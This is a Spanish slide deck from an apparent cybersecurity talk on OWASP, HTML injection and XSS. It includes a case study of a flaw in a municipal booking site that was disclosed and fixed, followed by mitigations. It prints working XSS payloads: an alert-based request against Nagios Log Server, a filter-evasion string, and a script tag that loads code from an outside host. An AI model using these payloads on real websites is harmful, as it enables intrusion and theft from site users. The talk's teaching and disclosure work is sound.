  • 5. https://c1b3rwall.policia.es/ OWASP ¿Qué es OWASP? • Open Web Application Security Project. Es una metodología de seguridad de código abierto y colaborativa que se utiliza como referente para auditorias de seguridad de aplicaciones web. • Organización sin ánimo de lucro. • Materia gratuito y fácilmente accesible en su web. • OWASP Top 10. • Apoyo financiero a través de patrocinadores y empresas. • Promueve el desarrollo seguro.
  • 6. https://c1b3rwall.policia.es/ OWASP TOP 10 Hay tres nuevas categorías, cuatro categorías con cambios de nombre y alcance, y alguna consolidación en el Top 10 de 2021. Hemos cambiado los nombres cuando ha sido necesario para centrarnos en la causa principal en lugar del síntoma. Source: https://owasp.org/Top10/es/
  • 7. https://c1b3rwall.policia.es/ HTML Injection La inyección HTML es un tipo de vulnerabilidad de inyección que ocurre cuando un usuario puede controlar un punto de entrada y puede inyectar código HTML arbitrario en una página web vulnerable.
  • 8. https://c1b3rwall.policia.es/ HTML Injection Un tercero podría aprovechar la incorrecta validación de entrada por parte del usuario para realizar un tipo de ataque que modifique el aspecto visual de la página denominado como defacement. Fuente: https://blog.segu-info.com.ar/2009/12/deface-twitter-por-un-ataque-del.html
  • 11. https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Es una inyección de código malicioso, que se ejecutará en el navegador de la víctima. El script malicioso puede guardarse en el servidor web y ejecutarse cada vez que el usuario llame a la funcionalidad correspondiente. También se puede realizar sin ningún script guardado en el servidor web.
  • 12. https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Reflected. Se descubrió una vulnerabilidad XSS reflected en Nagios Log Server (CVE-2021-35478). URL: GET /nagioslogserver/admin/audit-log?time=24h start= end= type= search= HTTP/1.1. La hora, el inicio, el final, el tipo y el parámetro de búsqueda eran vulnerables a Reflected XSS. GET /nagioslogserver/admin/audit-log?time=24h"><script>alert(1)</script> start= end= type= search= HTTP/1.1
  • 13. https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Stored. El parámetro pp para los resultados por página en el registro de auditoría y la página del historial de alertas era vulnerable a Stored XSS.
  • 14. https://c1b3rwall.policia.es/ Exponiendo la verdad. Se descubrió una vulnerabilidad web dentro del patronato de deportes de un Ayuntamiento el cual un tercero podría aprovecharse del hecho de la ausencia de validación de la entrada por parte del usuario para realizar distintos tipos de ataques web. En concreto, a la hora de hacer clic en un espacio libre para reservar una pista deportiva, tecnologías como Jquery, Bootstrap, ASP.NET (2012) se encontraban totalmente desactualizados y fuera de soporte dando lugar a posibles exploits en recursos como exploit-db entre otros.
  • 15. https://c1b3rwall.policia.es/ Exponiendo la verdad. HTML Injection. Se pudo confirmar que el campo del formulario ‘Datos del envío del justificante’ no presentaba una restricción de caracteres especiales, en concreto los etiquetado de apertura y cierre de etiquetas como html ‘<‘,’>’, que podían permitir a un tercero inyectar código malicioso.
  • 17. https://c1b3rwall.policia.es/ Restricción de caracteres. La protección ASP.NET permitía que hubiese restricción de caracteres. Se probó un conjunto de payloads por un diccionario dado y se observó que solamente se podían inyectar ciertos caracteres. (Consejo para profesionales de red team el siguiente recurso XSS Filter Evasion by OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) Véase el caso del ejemplo: <h1/onmouseover='u0061lert(1)'>%00
  • 18. https://c1b3rwall.policia.es/ Exponiendo la verdad. ¿Y si probamos con etiquetas propias de JavaScript?...
  • 19. https://c1b3rwall.policia.es/ Exponiendo la verdad. 1. Dado este punto intenté ‘jugar’ con el servidor para ver en qué punto me aceptaba como máximo la inyección de caracteres. Por ejemplo tomé este payload: <script/src=//NJ.₨></script> y la respuesta del servidor fue la siguiente: Casi…. 2. Probé ahora con el siguiente payload más acotado: <script src=//a.io> . La respuesta del servidor vez fue la siguiente: 3. Fui a la consola y efectivamente vi que se hacia una llamada al recurso www.a.io . Es decir, se puede apuntar a cargar script malicioso y realizar una petición frente a ese script.
  • 20. https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Como podía ejecutar de manera delimitada ciertos comandos, busqué el ansiado XSS, para ello utilicé Burpsuite y ejecuté un diccionario dentro de Intruder para realizar un ataque que no fuera manual para ser eficiente.
  • 21. https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Se trata de un XSS reflected. No tiene una severidad tan alta como un stored podía llevar a cabo una ejecución de código malicioso.
  • 22. https://c1b3rwall.policia.es/ Medidas de mitigación. 1. Validar la entrada por parte del usuario. Los datos que no son de confianza son cualquier dato que un atacante pueda controlar, entradas de formulario HTML, cadenas de consulta, encabezados HTTP, incluso datos procedentes de una base de datos, ya que un atacante puede infringir la base de datos incluso si no pueden infringir la aplicación. 2. Implementar un ciclo de vida de desarrollo seguro SDLC en el que se involucre en un proceso de auditoría de código a los programadores encargados de lanzar un producto en un entorno de pre producción hasta un entorno final de producción. 3. Realizar auditorías continuas de código estático y código dinámico que puedan permitir detectar vulnerabilidades en el activo. 4. La aplicación no debe aceptar ningún script, carácter especial o código HTML en los campos cuando no sea necesario. Debe evitar los caracteres especiales que pueden resultar dañinos. Algunos de los personajes principales utilizados en los guiones que deben evitarse son los siguientes: < > ( ) ' “ / * ; : = { } `(comilla grave) % + ^ ! — x00-x20 (x es una notación hexadecimal; incluye Espacio, Tabulador, Retorno de carro y Avance de línea). 5. Habilitar una Política de Seguridad de Contenido (CSP) supone una defensa profunda para la mitigación de vulnerabilidades XSS. 6. Codificar todas las salidas dentro del sitio, es decir, sustituir caracteres de toda aquella cadena que desee mostrarse en pantalla por ejemplo sustituir los símbolos de menor y mayor que por sus codificaciones correspondientes para html: &lt; y &gt; respectivamente. 7. Uso del atributo Secure y HttpOnly en las cookies.
  • 23. https://c1b3rwall.policia.es/ Respuesta del organismo público. Finalmente el organismo público pudo subsanar la vulnerabilidad, ejecutó una de las recomendaciones que se propuso como era impedir la inyección de caracteres especiales y actualmente no es posible realizar este tipo de ataques web asi como enviaron un email de agradecimiento.
  • 24. https://c1b3rwall.policia.es/ Conclusiones. En conclusión, en esta ponencia he tratado de dar importancia a: • El proceso de ciberseguridad en una empresa ya sea dentro del sector privado o publico forma parte de todos. • Los organismos deberían de dejar de ver la ciberseguridad como un gasto. • Es recomendable realizar un ciclo de vida de desarrollo seguro en cualquier aplicación que se vaya a implementar en un sistema de producción. • En los organismos públicos y fruto de la transformación digital es adecuado que los profesionales de la ciberseguridad vayamos con ellos en ir transformando el ecosistema digital que tenemos en España hacia un espacio más seguro. • Lo más importante bajo mi punto de vista y si habéis visto los detalles que he dejado en los anteriores slides…